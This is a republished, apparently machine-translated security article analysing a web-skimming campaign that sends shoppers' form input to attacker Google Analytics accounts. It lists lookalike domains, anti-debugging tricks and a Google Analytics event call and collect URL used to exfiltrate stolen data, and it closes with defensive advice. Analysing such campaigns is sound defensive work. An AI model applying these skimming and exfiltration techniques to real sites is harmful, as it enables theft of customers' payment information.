Shulou(Shulou.com)05/31 Report--

How to carry out the analysis of Google Analytics attacks, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain for you in detail, people with this need can come to learn, I hope you can gain something.

Web skimming is a common attack that usually targets online shoppers. The principle is simple: an attacker injects malicious code into an infected site and uses the site to collect user input data and send it to a designated server. If the attack succeeds, the attacker can access the shopper's payment information.

Attack analysis

Attackers usually register domain names for popular network services, especially Google Analytics (google-anatytics [.] com, google-analytcsapi [.] com, google-analytc [.] com, google-anaiytlcs [.] com, google-analytics [.] top, google-analytics [.] cm, google-analytics [.] to, google-analytics-js [.] com, googlc-analytics [.] com). To collect visitor data using Google Analytics, site owners must configure tracking parameters in their analytics.google.com, get the tracking ID (trackingId), and then insert it into the page and into the tracking code. Multiple tracking codes can be deployed on one site at the same time, sending visitor data to different Analytics accounts.

Recently, about 20 infected sites have been found around the world. the victims include digital equipment, cosmetics, food, spare parts and other stores in Europe, North and South America. The following figure shows malicious code with attacker tracking code and tracking ID:

Attackers try to hide their malicious activities using classic anti-debugging techniques. The following figure shows the code to check to see if developer mode is enabled in the visitor browser.

The attacker leaves himself the option to monitor the script in Debug mode. If the browser's local storage (localStorage) contains the value 'debug_mode'=='11', even in developer mode, malicious code executes and writes comments with errors to the console. The following figure shows "debug mode" checking the code and the Ripple * encryption algorithm (used to encrypt data before it is sent).

If anti-debugging is passed, the script collects all the input on the website and uses Google Analytics to encrypt and send the collected data, as shown in the following figure:

Send data by calling the send event method in the "eventAction" field, with the function signature as follows:

Ga ('send',' event', {'eventCategory':' Category', / / Protocol Parameter: text; Max Lenght: 150 Bytes' eventAction': 'Action', / / Protocol Parameter: ea; Value type: text; Max Lenght: 500 Bytes' eventLabel': 'Label' / / Protocol Parameter: el; Value type: text; Max Lenght: 500 Bytes})

The HTTP request is sent to URL

Https [:] / / www.google-analytics.com/collect? & ea = packed_stolen_data&

The following figure shows an example obfuscation option in which malicious script calls from firebasestorage.googleapis [.] com are inserted into the infected site.

After processing, you get the following script:

Hazard analysis

Google Analytics is a very popular service (according to BuiltWith data, it has been used on 29 million websites) and is blindly trusted by users: administrators write *. Google-analytics.com into the Content-Security-Policy header to allow the service to collect data and carry out attacks without downloading code from external sources.

Precautionary measures

1. Do not install Web applications and CMS components from untrusted sources. Keep all software up-to-date, pay attention to the relevant vulnerability news, and fix the vulnerability in time.

2. Create strong passwords for all administrative accounts.

3. Limit the user rights to a minimum and track the number of users who have access to the service interface.

4. Filter the data entered by users and query parameters to prevent third-party code injection.

5. For e-commerce sites, it is recommended to use compatible PCI DSS payment gateways.

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.